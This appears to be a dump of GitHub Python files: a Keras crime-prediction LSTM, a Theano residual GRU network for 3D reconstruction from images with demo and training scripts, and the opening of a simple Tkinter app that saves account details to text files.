numpy.reshape(testX_DOY,(testX_DOY.shape[0],5,2))\n\nprint(\"Reshape HOY\",trainX_DOY.shape,testX_DOY.shape)\n\ntrainX_loc = numpy.reshape(trainX_loc,(trainX_loc.shape[0],5,1))\ntestX_loc = numpy.reshape(testX_loc,(testX_loc.shape[0],5,1))\n\nprint(\"Reshape Location\", trainX_loc.shape, testX_loc.shape)\n\n'''\nMake a neural network with LSTM and dense of 2 output\nfor the hour of year feature.\n'''\nDOY_Branch = Sequential()\nDOY_Branch.add(LSTM(32,return_sequences=False,input_dim = 2))\nDOY_Branch.add(Dense(2))\n\n'''\nMake a neural network with LSTM and dense of 6 output\nfor the Type of crime feature.\n'''\nType_Branch = Sequential()\nType_Branch.add(LSTM(32,return_sequences=False,input_dim = 6))\nType_Branch.add(Dense(6))\n\n'''\nMake a neural network with LSTM and dense of 1 output\nfor the location feature.\n'''\nLoc_Branch = Sequential()\nLoc_Branch.add(LSTM(32,return_sequences=False,input_dim=1))\nLoc_Branch.add(Dense(1))\n\n'''\nThe final model takes a merge of all three previous models\nand concatenates and passes to a dense layer which outputs the\n6 possible categories.\n'''\nfinal_model = Sequential()\nfinal_model.add(Merge([DOY_Branch, Type_Branch, Loc_Branch], mode='concat'))\nfinal_model.add(Dense(6,activation='softmax'))\n\n'''\nModel is compiled with an ADAM optimizer and loss function is\nmean squared error. The metrics are accuracy and categorical_accuracy.\n'''\nfinal_model.compile(optimizer='adam', loss='mean_squared_error',metrics=['accuracy','categorical_accuracy'])\n\n'''\nTrain model using training dataset\n'''\nfinal_model.fit([trainX_DOY, trainX_main, trainX_loc], trainY_main, nb_epoch=10,batch_size=10, verbose=2)\n\n'''\nEvaluate the model using the testing dataset.\n'''\ntry:\n    print(\"Evaluating:\")\n    score = final_model.evaluate([testX_DOY, testX_main, testX_loc], testY_main, batch_size = 10)\n    print(\"Score is :\", score)\nexcept:\n    print(\"Couldn't evaluate due to nonetype error\")\n'''\nSave the model and the weights.\n'''\nfinal_model.save('FunctionMergeCrimeHOYClusterLoc.h5')\n\n'''\nPredict the output using all elements of the training dataset\nand the test dataset.\n'''\ntrainPredict = final_model.predict([trainX_DOY, trainX_main, trainX_loc])\ntestPredict = final_model.predict([testX_DOY, testX_main, testX_loc])\n\n'''\nSave the predicted outputs.\n'''\nnumpy.savetxt(\"resultstrainpredict.csv\", trainPredict, delimiter=\",\")\nnumpy.savetxt(\"resultstestpredict.csv\",testPredict,delimiter=\",\")\n" }, { "alpha_fraction": 0.7092411518096924, "alphanum_fraction": 0.729526698589325, "avg_line_length": 27.319149017333984, "blob_id": "97d4161cbd5fcee8969175a8304d2910d0f49588", "content_id": "fd9b2d961257ff2817643cf1d3739cc0b6627ee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1331, "license_type": "no_license", "max_line_length": 77, "num_lines": 47, "path": "/Saved/Project_prev.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67)\ntest_size = int(len(dataframe)-train_size)\n\ntrain, 
test=dataframe[0:train_size,:], dataframe[train_size:len(dataframe),:]\nprint(len(train),len(test))\n\ndef create_database(dataset,look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-1):\n a= dataset[i:(i+look_back),:]\n dataX.append(a)\n dataY.append(dataset[i+look_back,:])\n return numpy.array(dataX), numpy.array(dataY)\n\nlook_back = 1\ntrainX, trainY = create_database(train,look_back)\ntestX, testY = create_database(test,look_back)\ntrainX = numpy.reshape(trainX,(trainX.shape[0],1,9))\ntestX = numpy.reshape(testX,(testX.shape[0],1,9))\n\nprint(trainX[0])\n\n'''\nmodel=Sequential()\nmodel.add(LSTM(16,input_dim=look_back*4+5))\nmodel.add(Dense(9))\nmodel.compile(loss='mean_squared_error',optimizer='adam')\nmodel.fit(trainX, trainY, nb_epoch=100,batch_size=10, verbose=2)\n\n\n\nmodel.save('my_model.h5')\n'''\n" } ]
11
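The create_database helpers in CrimeTypeMerged.py above build supervised sequences by sliding a look_back window over the rows of the formatted CSV. Below is a minimal NumPy-only sketch of that windowing idea on toy data; the function name and shapes are illustrative, not the repository's API, and the loop bound deliberately mirrors the source, which skips the final usable window.

import numpy as np

def sliding_windows(dataset, look_back=5):
    # Each input sample holds the previous look_back rows;
    # the target is the row that immediately follows the window.
    X, y = [], []
    for i in range(len(dataset) - look_back - 1):  # the extra -1 matches the source
        X.append(dataset[i:i + look_back, :])
        y.append(dataset[i + look_back, :])
    return np.array(X), np.array(y)

toy = np.arange(20, dtype=float).reshape(10, 2)  # 10 timesteps, 2 features
X, y = sliding_windows(toy, look_back=5)
print(X.shape, y.shape)  # (4, 5, 2) (4, 2)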
JoshuaTellez/Comp-Vision_CS519
https://github.com/JoshuaTellez/Comp-Vision_CS519
0b3c72933787430631271c548eb7caedfe5365ab
b1679845b9836ace4922e10d4aa5ce3aa79ba57b
07de3d98b44a45da64183677e8d61a984490c14b
refs/heads/master
2021-08-23T13:14:23.740565
2017-12-05T01:43:07
2017-12-05T01:43:07
113,016,795
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6205157041549683, "alphanum_fraction": 0.6390134692192078, "avg_line_length": 27.774192810058594, "blob_id": "6c11522ec06f5b4f6299beb882471991c021cce3", "content_id": "9ee992406bcddbd0f9e83d05429101d13556f460", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1784, "license_type": "no_license", "max_line_length": 89, "num_lines": 62, "path": "/my_demo.py", "repo_name": "JoshuaTellez/Comp-Vision_CS519", "src_encoding": "UTF-8", "text": "# Modules used\nimport sys\nimport shutil\nimport numpy as np\nfrom subprocess import call\nfrom PIL import Image\n\n# From library by authors\nfrom lib.solver import Solver\nfrom lib.voxel import voxel2obj\n\n# my reimplimentation\nfrom my_3DR2N2.my_res_gru_net import My_ResidualGRUNet\n\n# Load image(s)\ndef load_demo_images(num_imgs,img_file):\n\n # Resize the image(s) to be compatible\n size = 127, 127\n ims = []\n\n # Load all images\n for i in range(num_imgs):\n # Make images compatible\n im = Image.open(img_file + '/%d.png' % i).convert('RGB')\n\n # Resize image\n im.thumbnail(size)\n ims.append([np.array(im).transpose(\n (2, 0, 1)).astype(np.float32) / 255.])\n\n return np.array(ims)\n\n\ndef main():\n # Save prediction into a file named 'prediction.obj' or the given argument\n pred_file_name = sys.argv[1] if len(sys.argv) > 1 else 'prediction.obj'\n\n num_imgs = int(sys.argv[2]) if len(sys.argv) > 2 else 1\n img_file = sys.argv[3]\n\n # load images\n demo_imgs = load_demo_images(num_imgs,img_file)\n\n # Define a network and a solver. Solver provides a wrapper for the test function.\n my_net = My_ResidualGRUNet(batch=1) # instantiate a network\n my_net.load('my_3DR2N2/weights.npy') # load downloaded weights\n solver = Solver(my_net) # instantiate a solver\n\n # Run the network\n voxel_prediction, _ = solver.test_output(demo_imgs)\n\n # Save the prediction to a mesh file).\n voxel2obj(pred_file_name, voxel_prediction[0, :, 1, :, :] > 0.4)\n\n if shutil.which('meshlab') is not None:\n call(['meshlab', pred_file_name])\n else:\n print('Meshlab not found: please use visualization of your choice to view %s' %\n pred_file_name)\n\nmain()\n" }, { "alpha_fraction": 0.6770244836807251, "alphanum_fraction": 0.685969889163971, "avg_line_length": 27.31999969482422, "blob_id": "db695d54a8b0e04ff22222e550fca2e16e9ef68e", "content_id": "80af343b07f2d4c54cccfc4213fb40cd5a4204a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2124, "license_type": "no_license", "max_line_length": 93, "num_lines": 75, "path": "/my_train_net.py", "repo_name": "JoshuaTellez/Comp-Vision_CS519", "src_encoding": "UTF-8", "text": "# Modules used\nfrom multiprocessing import Queue\n\n# From Library by authors\nfrom lib.solver import Solver\nfrom lib.data_io import category_model_id_pair\nfrom lib.data_process import kill_processes, make_data_processes\n\n# My reimplementation\nfrom my_3DR2N2.my_res_gru_net import My_ResidualGRUNet\n\n# Define globally accessible queues, will be used for clean exit when force\ntrain_queue, validation_queue, train_processes, val_processes = None, None, None, None\n\n# Clean up in case of unexpected quit\ndef cleanup_handle(func):\n def func_wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except:\n print('Wait until the dataprocesses to end')\n kill_processes(train_queue, train_processes)\n kill_processes(validation_queue, val_processes)\n raise\n\n return func_wrapper\n\n\n# Train the 
network\n@cleanup_handle\ndef train_net():\n\n    # Set up the model and the solver\n    my_net = My_ResidualGRUNet()\n\n    # Generate the solver\n    solver = Solver(my_net)\n\n    # Load the global variables\n    global train_queue, validation_queue, train_processes, val_processes\n\n    # Initialize the queues\n    train_queue = Queue(15) # maximum number of minibatches that can be put in a data queue\n    validation_queue = Queue(15)\n\n    # Train on 80 percent of the data\n    train_dataset_portion = [0, 0.8]\n\n    # Validate on 20 percent of the data\n    test_dataset_portion = [0.8, 1]\n\n    # Establish the training processes\n    train_processes = make_data_processes(\n        train_queue,\n        category_model_id_pair(dataset_portion=train_dataset_portion),\n        1,\n        repeat=True)\n\n    # Establish the validation processes\n    val_processes = make_data_processes(\n        validation_queue,\n        category_model_id_pair(dataset_portion=test_dataset_portion),\n        1,\n        repeat=True,\n        train=False)\n\n    # Train the network\n    solver.train(train_queue, validation_queue)\n\n    # Cleanup the processes and the queue.\n    kill_processes(train_queue, train_processes)\n    kill_processes(validation_queue, val_processes)\n\n\ntrain_net()\n" }, { "alpha_fraction": 0.48963961005210876, "alphanum_fraction": 0.5424331426620483, "avg_line_length": 39.960784912109375, "blob_id": "331a468e317ff909cd36bc6ffee3f5e0772f70e8", "content_id": "1823ebe2c39825f31d6b930608527d5fdd7abe48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14623, "license_type": "no_license", "max_line_length": 123, "num_lines": 357, "path": "/my_res_gru_net.py", "repo_name": "JoshuaTellez/Comp-Vision_CS519", "src_encoding": "UTF-8", "text": "# Modules used\nimport numpy as np\nimport theano\nimport theano.tensor as tensor\nimport datetime as dt\n\n\n# Taken from original repository. All of the layers were made by authors\nfrom lib.layers import TensorProductLayer, ConvLayer, PoolLayer, Unpool3DLayer, \\\n    LeakyReLU, SoftmaxWithLoss3D, Conv3DLayer, InputLayer, FlattenLayer, \\\n    FCConv3DLayer, TanhLayer, SigmoidLayer, ComplementLayer, AddLayer, \\\n    EltwiseMultiplyLayer, get_trainable_params\n\n# Initialize the tensor object\ntensor5 = tensor.TensorType(theano.config.floatX, (False,) * 5)\n\n# The Residual Gated Recurrent Unit network (my reimplementation)\nclass My_ResidualGRUNet():\n\n    # Initialize network parameters\n    def __init__(self, random_seed=dt.datetime.now().microsecond, batch=36):\n\n        # Initialize the random number generator\n        self.rng = np.random.RandomState(random_seed)\n\n        # Set the batch size\n        self.batch_size = batch\n\n        # Images should have a width and height of 127 x 127\n        self.img_width = 127\n        self.img_height = 127\n\n        # The 3D Convolutional LSTM will be of 4 x 4 x 4 dimensions\n        self.n_gru_vox = 4\n\n        # The input and output values are a 5D tensor object\n        self.x = tensor5()\n        self.y = tensor5()\n\n        # list of activation functions\n        self.activations = []\n\n        # Final loss of network\n        self.loss = []\n\n        # Predicted output\n        self.output = []\n\n        # Error on predicted output when training\n        self.error = []\n\n        # Weights of all the layers\n        self.params = []\n\n        # Create the network structure\n        self.network_definition()\n\n    def network_definition(self):\n\n        # Depth of the convolutional layers. VGG Style\n        cnn_filters = [96, 128, 256, 256, 256, 256]\n\n        # One fully connected layer for a 1024 feature vector\n        fully_connecter_filter = [1024]\n\n        # Shape of input layers. 
Used by encoder and GRU\n input_shape = (self.batch_size, 3, self.img_width, self.img_height)\n\n ######### Encoder ##########\n\n # Input Layer\n x = InputLayer(input_shape)\n\n ## First set of convolutional layers ##\n conv1a = ConvLayer(x, (cnn_filters[0], 7, 7)) # 96 x 7 x 7\n conv1b = ConvLayer(conv1a, (cnn_filters[0], 3, 3)) # 96 x 3 x 3\n pool1 = PoolLayer(conv1b) # Max Pooling\n\n ## Second set of convolutional layers ##\n conv2a = ConvLayer(pool1, (cnn_filters[1], 3, 3)) # 128 x 3 x 3\n conv2b = ConvLayer(conv2a, (cnn_filters[1], 3, 3)) # 128 x 3 x 3\n conv2c = ConvLayer(conv2b, (cnn_filters[1], 1, 1)) # 128 x 1 x 1\n pool2 = PoolLayer(conv2c) # Max Pooling\n\n ## Third set of convolutional layers ##\n conv3a = ConvLayer(pool2, (cnn_filters[2], 3, 3)) # 256 x 3 x 3\n conv3b = ConvLayer(conv3a, (cnn_filters[2], 3, 3)) # 256 x 3 x 3\n conv3c = ConvLayer(pool2, (cnn_filters[2], 1, 1)) # 256 x 1 x 1\n pool3 = PoolLayer(conv3b) # Max Pooling\n\n ## Fourth set of convolutional layers ##\n conv4a = ConvLayer(pool3, (cnn_filters[3], 3, 3)) # 256 x 3 x 3\n conv4b = ConvLayer(conv4a, (cnn_filters[3], 3, 3)) # 256 x 3 x 3\n pool4 = PoolLayer(conv4b) # Max Pooling\n\n ## Fifth set of convolutional layers ##\n conv5a = ConvLayer(pool4, (cnn_filters[4], 3, 3)) # 256 x 3 x 3\n conv5b = ConvLayer(conv5a, (cnn_filters[4], 3, 3)) # 256 x 3 x 3\n conv5c = ConvLayer(pool4, (cnn_filters[4], 1, 1)) # 256 x 1 x 1\n pool5 = PoolLayer(conv5b) # Max pooling\n\n ## Sixth set of convolutional layers ##\n conv6a = ConvLayer(pool5, (cnn_filters[5], 3, 3)) # 256 x 3 x 3\n conv6b = ConvLayer(conv6a, (cnn_filters[5], 3, 3)) # 256 x 3 x 3\n pool6 = PoolLayer(conv6b)\n\n # Flatten layer\n flat6 = FlattenLayer(pool6)\n\n # Fully Connected layer\n fc7 = TensorProductLayer(flat6, 1024) # 1024 feature vector\n\n ########## End Encoder ############\n\n\n ########## Gated Recurrent Unit ############\n\n # Filter size of layers within the unit\n gru_filters = [96, 128, 256, 256, 256, 256]\n\n # The 3D Convolutional LSTM has a grid structure of 4 x 4 x 4. 128 for first layer of decoder\n s_shape = (self.batch_size, self.n_gru_vox, gru_filters[1], self.n_gru_vox, self.n_gru_vox)\n\n # Initialize the first previous state to nothing\n prev_s = InputLayer(s_shape) # h(t-1)\n\n # 3 x 3 x 3 Convolution of hidden states of self and neighbors\n # Wfx T(xt) (+) Uf * h(t-1) + bf\n update_layer = FCConv3DLayer(prev_s, fc7, (gru_filters[1], gru_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n\n # Wix T(xt) (+) Ui * h(t-1) + bi\n reset_layer = FCConv3DLayer(prev_s, fc7, (gru_filters[1], gru_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n\n # Sigmoid (Wix T(xt) (+) Ui * h(t-1) + bi)\n reset_gate = SigmoidLayer(reset_layer)\n\n # rt (.) h(t-1)\n rs = EltwiseMultiplyLayer(reset_gate, prev_s) # Used for h(t)\n\n # Wh T(xt) (+) Uh * (rt (.) 
h(t-1) + bh\n hidden_state_layer = FCConv3DLayer(rs, fc7, (gru_filters[1], gru_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n\n # Recurrence unit\n def recurrence(x_curr, prev_s_tensor, prev_in_gate_tensor):\n\n # Input layer\n input_ = InputLayer(input_shape, x_curr)\n\n # GRU network same parameters as encoder\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv1a_ = ConvLayer(input_, (gru_filters[0], 7, 7), params=conv1a.params) # 96 x 7 x 7\n rect1a_ = LeakyReLU(conv1a_)\n conv1b_ = ConvLayer(rect1a_, (gru_filters[0], 3, 3), params=conv1b.params) # 96 x 3 x 3\n rect1_ = LeakyReLU(conv1b_)\n pool1_ = PoolLayer(rect1_)\n\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv2a_ = ConvLayer(pool1_, (gru_filters[1], 3, 3), params=conv2a.params) # 128 x 3 x 3\n rect2a_ = LeakyReLU(conv2a_)\n conv2b_ = ConvLayer(rect2a_, (gru_filters[1], 3, 3), params=conv2b.params) # 128 x 3 x 3\n rect2_ = LeakyReLU(conv2b_)\n conv2c_ = ConvLayer(pool1_, (gru_filters[1], 1, 1), params=conv2c.params) # 128 x 1 x 1\n res2_ = AddLayer(conv2c_, rect2_)\n pool2_ = PoolLayer(res2_)\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv3a_ = ConvLayer(pool2_, (gru_filters[2], 3, 3), params=conv3a.params) # 256 x 3 x 3\n rect3a_ = LeakyReLU(conv3a_)\n conv3b_ = ConvLayer(rect3a_, (gru_filters[2], 3, 3), params=conv3b.params) # 256 x 3 x 3\n rect3_ = LeakyReLU(conv3b_)\n conv3c_ = ConvLayer(pool2_, (gru_filters[2], 1, 1), params=conv3c.params) # 256 x 1 x 1\n res3_ = AddLayer(conv3c_, rect3_)\n pool3_ = PoolLayer(res3_)\n\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv4a_ = ConvLayer(pool3_, (gru_filters[3], 3, 3), params=conv4a.params) # 256 x 3 x 3\n rect4a_ = LeakyReLU(conv4a_)\n conv4b_ = ConvLayer(rect4a_, (gru_filters[3], 3, 3), params=conv4b.params) # 256 x 3 x 3\n rect4_ = LeakyReLU(conv4b_)\n pool4_ = PoolLayer(rect4_)\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv5a_ = ConvLayer(pool4_, (gru_filters[4], 3, 3), params=conv5a.params) # 256 x 3 x 3\n rect5a_ = LeakyReLU(conv5a_)\n conv5b_ = ConvLayer(rect5a_, (gru_filters[4], 3, 3), params=conv5b.params) # 256 x 3 x 3\n rect5_ = LeakyReLU(conv5b_)\n conv5c_ = ConvLayer(pool4_, (gru_filters[4], 1, 1), params=conv5c.params) # 256 x 1 x 1\n res5_ = AddLayer(conv5c_, rect5_)\n pool5_ = PoolLayer(res5_)\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv6a_ = ConvLayer(pool5_, (gru_filters[5], 3, 3), params=conv6a.params) # 256 x 3 x 3\n rect6a_ = LeakyReLU(conv6a_)\n conv6b_ = ConvLayer(rect6a_, (gru_filters[5], 3, 3), params=conv6b.params) # 256 x 3 x 3\n rect6_ = LeakyReLU(conv6b_)\n res6_ = AddLayer(pool5_, rect6_)\n pool6_ = PoolLayer(res6_)\n\n # Flatten Layer\n flat6_ = FlattenLayer(pool6_)\n\n # Fully connected layer\n fc7_ = TensorProductLayer(flat6_, fully_connecter_filter[0], params=fc7.params)\n rect7_ = LeakyReLU(fc7_)\n\n # h(t-1)\n prev_s_ = InputLayer(s_shape, prev_s_tensor)\n\n # FC layer convoluted with hidden states\n update_layer_ = FCConv3DLayer(\n prev_s_,\n rect7_, (gru_filters[1], gru_filters[1], 3, 3, 3), # 128 x 3 x 3 x 3\n params=update_layer.params)\n\n # FC layer convoluted with hidden states\n reset_layer_ = FCConv3DLayer(\n prev_s_,\n rect7_, (gru_filters[1], gru_filters[1], 3, 3, 3), # 128 x 3 x 3 x 3\n 
params=reset_layer.params)\n\n            # Sigmoid( Wfx T(xt) (+) Uf * h(t-1) + bf )\n            update_gate_ = SigmoidLayer(update_layer_)\n\n            # 1 - u(t)\n            complement_update_gate_ = ComplementLayer(update_gate_)\n\n            # Sigmoid (Wix T(xt) (+) Ui * h(t-1) + bi)\n            reset_gate_ = SigmoidLayer(reset_layer_)\n\n            # rt (.) h(t-1)\n            rs_ = EltwiseMultiplyLayer(reset_gate_, prev_s_)\n\n            # Uh * rt (.) h(t-1) + bh\n            hidden_layer_ = FCConv3DLayer(\n                rs_, rect7_, (gru_filters[1], gru_filters[1], 3, 3, 3), params=hidden_state_layer.params) # 128 x 3 x 3 x 3\n\n            tanh_layer = TanhLayer(hidden_layer_)\n\n            # ht = ut (.) h(t-1) (+) (1 - ut) (.) tanh( Uh * rt (.) h(t-1) + bh )\n            gru_out_ = AddLayer(\n                EltwiseMultiplyLayer(update_gate_, prev_s_),\n                EltwiseMultiplyLayer(complement_update_gate_, tanh_layer))\n\n            return gru_out_.output, update_gate_.output\n\n\n        s_update, _ = theano.scan(recurrence,\n                                  sequences=[self.x], # along with images, feed in the index of the current frame\n                                  outputs_info=[tensor.zeros_like(np.zeros(s_shape),\n                                                                  dtype=theano.config.floatX),\n                                                tensor.zeros_like(np.zeros(s_shape),\n                                                                  dtype=theano.config.floatX)])\n\n        # Update of all units\n        update_all = s_update[-1]\n        s_all = s_update[0]\n\n        # Last hidden states (final timestep)\n        s_last = s_all[-1]\n\n\n        ########## End GRU ##########\n\n\n        ########## Decoder ##########\n\n        # Depth of deconvolutional layers\n        dcnn_filters = [128, 128, 128, 64, 32, 2]\n\n        # Input Layer\n        gru_s = InputLayer(s_shape, s_last)\n\n        # Residual |=> ----------------------------------------------=V\n        # Unpooling -> deconvolution -> LeakyReLU -> DeConv -> LeakyReLU ->\n        unpool7 = Unpool3DLayer(gru_s)\n        conv7a = Conv3DLayer(unpool7, (dcnn_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n        rect7a = LeakyReLU(conv7a)\n        conv7b = Conv3DLayer(rect7a, (dcnn_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n        rect7 = LeakyReLU(conv7b)\n        res7 = AddLayer(unpool7, rect7)\n\n        # Residual |=> ----------------------------------------------=V\n        # Unpooling -> deconvolution -> LeakyReLU -> DeConv -> LeakyReLU ->\n        unpool8 = Unpool3DLayer(res7)\n        conv8a = Conv3DLayer(unpool8, (dcnn_filters[2], 3, 3, 3)) # 128 x 3 x 3 x 3\n        rect8a = LeakyReLU(conv8a)\n        conv8b = Conv3DLayer(rect8a, (dcnn_filters[2], 3, 3, 3)) # 128 x 3 x 3 x 3\n        rect8 = LeakyReLU(conv8b)\n        res8 = AddLayer(unpool8, rect8)\n\n        # Residual |=> ----------------------------------------------=V\n        # Unpooling -> deconvolution -> LeakyReLU -> DeConv -> LeakyReLU ->\n        unpool9 = Unpool3DLayer(res8)\n        conv9a = Conv3DLayer(unpool9, (dcnn_filters[3], 3, 3, 3)) # 64 x 3 x 3 x 3\n        rect9a = LeakyReLU(conv9a)\n        conv9b = Conv3DLayer(rect9a, (dcnn_filters[3], 3, 3, 3)) # 64 x 3 x 3 x 3\n        rect9 = LeakyReLU(conv9b)\n        conv9c = Conv3DLayer(unpool9, (dcnn_filters[3], 1, 1, 1)) # 64 x 1 x 1 x 1\n        res9 = AddLayer(conv9c, rect9)\n\n        # Residual |=> ----------------------------------------------=V\n        # Conv -> LeakyReLU -> Conv -> LeakyReLU (no unpooling at this level) ->\n        conv10a = Conv3DLayer(res9, (dcnn_filters[4], 3, 3, 3)) # 32 x 3 x 3 x 3\n        rect10a = LeakyReLU(conv10a)\n        conv10b = Conv3DLayer(rect10a, (dcnn_filters[4], 3, 3, 3)) # 32 x 3 x 3 x 3\n        rect10 = LeakyReLU(conv10b)\n        conv10c = Conv3DLayer(rect10a, (dcnn_filters[4], 3, 3, 3)) # 32 x 3 x 3 x 3\n        res10 = AddLayer(conv10c, rect10)\n\n        # Last convolution\n        conv11 = Conv3DLayer(res10, (dcnn_filters[5], 3, 3, 3)) # 2 x 3 x 3 x 3\n\n        # Softmax layer\n        softmax_loss = SoftmaxWithLoss3D(conv11.output)\n\n\n        ########## End Decoder #########\n\n        self.loss = softmax_loss.loss(self.y)\n        self.error = softmax_loss.error(self.y)\n        self.params = 
get_trainable_params()\n self.output = softmax_loss.prediction()\n self.activations = [update_all]\n\n\n # Save the weights to a file\n def save(self, filename):\n params_cpu = []\n for param in self.params:\n params_cpu.append(param.val.get_value())\n np.save(filename, params_cpu)\n print('saving network parameters to ' + filename)\n\n # Load parameters from file\n def load(self, filename, ignore_param=True):\n print('loading network parameters from ' + filename)\n params_cpu_file = np.load(filename)\n if filename.endswith('npz'):\n params_cpu = params_cpu_file[params_cpu_file.keys()[0]]\n else:\n params_cpu = params_cpu_file\n\n succ_ind = 0\n for param_idx, param in enumerate(self.params):\n try:\n param.val.set_value(params_cpu[succ_ind])\n succ_ind += 1\n except IndexError:\n if ignore_param:\n print('Ignore mismatch')\n else:\n raise\n" } ]
3
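The recurrence in my_res_gru_net.py above implements GRU gating with convolutional layers: a reset gate masks the previous hidden state before the tanh candidate is computed, and an update gate blends that candidate with the previous state. Below is a dense NumPy sketch of the same arithmetic, with toy sizes, random weights, and biases omitted; the names are illustrative, not the Theano layers above.

import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def gru_step(x, h_prev, Wu, Uu, Wr, Ur, Wh, Uh):
    u = sigmoid(Wu @ x + Uu @ h_prev)             # update gate
    r = sigmoid(Wr @ x + Ur @ h_prev)             # reset gate
    h_cand = np.tanh(Wh @ x + Uh @ (r * h_prev))  # candidate state
    # Same blend as the AddLayer/EltwiseMultiplyLayer combination:
    # keep u of the old state, take (1 - u) of the candidate.
    return u * h_prev + (1.0 - u) * h_cand

rng = np.random.default_rng(7)
dim_x, dim_h = 4, 3
Ws = [rng.normal(size=(dim_h, dim_x)) for _ in range(3)]
Us = [rng.normal(size=(dim_h, dim_h)) for _ in range(3)]
h = np.zeros(dim_h)
for t in range(5):  # unrolled over a few timesteps
    h = gru_step(rng.normal(size=dim_x), h, Ws[0], Us[0], Ws[1], Us[1], Ws[2], Us[2])
print(h.shape)  # (3,)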
vorier/Data_master
https://github.com/vorier/Data_master
a65ceefb6d11eed7eda6bd2f7c1c32c757bbee86
4eb0d0fd30d21f9f5a15757f3730529eb28a75e5
75ec6a150f9e70278858ac54fc78c109a9f1feea
refs/heads/main
2023-01-27T21:03:44.627049
2020-12-11T18:14:30
2020-12-11T18:14:30
320,649,825
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5635380744934082, "alphanum_fraction": 0.5971417427062988, "avg_line_length": 29.0059871673584, "blob_id": "a0c40c64bd204147770cb4a59b8575440cb3c6bd", "content_id": "a5c5a24843f5c7f8dc5eb156ffda1207f5f2ddc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5178, "license_type": "no_license", "max_line_length": 115, "num_lines": 167, "path": "/Data master.py", "repo_name": "vorier/Data_master", "src_encoding": "UTF-8", "text": "from tkinter import *\r\nfrom tkinter import filedialog\r\nimport tkinter as tk\r\nimport os\r\nimport os.path\r\n\r\n\r\ndef write_data():\r\n username_info = username.get()\r\n password_info = password.get()\r\n email_info = email.get()\r\n website_info = website.get()\r\n\r\n\r\n save_path = \"94682167846512318\"\r\n path_name = os.path.join(save_path, website_info + \".txt\")\r\n with open(path_name, \"w\") as f:\r\n f.write(\"Website: \" + website_info + \"\\n\")\r\n f.write(\"Username: \" + username_info + \"\\n\")\r\n f.write(\"Password: \" + password_info + \"\\n\")\r\n f.write(\"Email: \" + email_info + \"\\n\")\r\n\r\n username_input.delete(0, END)\r\n password_input.delete(0, END)\r\n email_input.delete(0, END)\r\n website_input.delete(0, END)\r\n\r\n Label(nscreen, text=\"File created\", fg=\"green\", font=(\"calibri, 12\")).pack()\r\n\r\n\r\ndef newf():\r\n\r\n global nscreen\r\n nscreen = Toplevel(screen)\r\n nscreen.title(\"New\")\r\n nscreen.geometry(\"300x300\")\r\n\r\n global username\r\n global password\r\n global email\r\n global website\r\n global username_input\r\n global password_input\r\n global email_input\r\n global website_input\r\n username = StringVar()\r\n password = StringVar()\r\n email = StringVar()\r\n website = StringVar()\r\n\r\n Label(nscreen, text=\"Enter your details below\").pack()\r\n Label(nscreen, text=\"\").pack()\r\n Label(nscreen, text=\"Username:\").pack()\r\n username_input = Entry(nscreen, textvariable=username)\r\n username_input.pack()\r\n Label(nscreen, text=\"Password:\").pack()\r\n password_input = Entry(nscreen, textvariable=password)\r\n password_input.pack()\r\n Label(nscreen, text=\"Email:\").pack()\r\n email_input = Entry(nscreen, textvariable=email)\r\n email_input.pack()\r\n Label(nscreen, text=\"Website:\").pack()\r\n website_input = Entry(nscreen, textvariable=website)\r\n website_input.pack()\r\n create_file = tk.Button(nscreen, text=\"Create File\", width=10, height=1, command=write_data)\r\n create_file.pack()\r\n\r\n\r\ndef openf():\r\n\r\n oscreen = Toplevel(screen)\r\n oscreen.title(\"File Editor\")\r\n oscreen.iconbitmap(\"C:\")\r\n oscreen.geometry(\"500x450\")\r\n\r\n def viewf():\r\n\r\n text_file = filedialog.askopenfilename(initialdir=\"94682167846512318\",\r\n title=\"Open Text File\", filetypes=((\"Test File\", \"*.txt\"),))\r\n text_file = open(text_file, \"r\")\r\n tf = text_file.read()\r\n\r\n my_text.insert(END, tf)\r\n text_file.close()\r\n\r\n def savef():\r\n text_file = filedialog.askopenfilename(initialdir=\"94682167846512318\",\r\n title=\"Open Text File\", filetypes=((\"Test File\", \"*.txt\"),))\r\n text_file = open(text_file, \"w\")\r\n tf = text_file.write(my_text.get(1.0, END))\r\n\r\n my_text.insert(END, tf)\r\n text_file.close()\r\n\r\n my_text = Text(oscreen, bg=\"white\", width=40, height=15, font=(\"Helvetica\", 16))\r\n my_text.pack(pady=20)\r\n\r\n open_button = tk.Button(oscreen, text=\"Open File\", width=20, 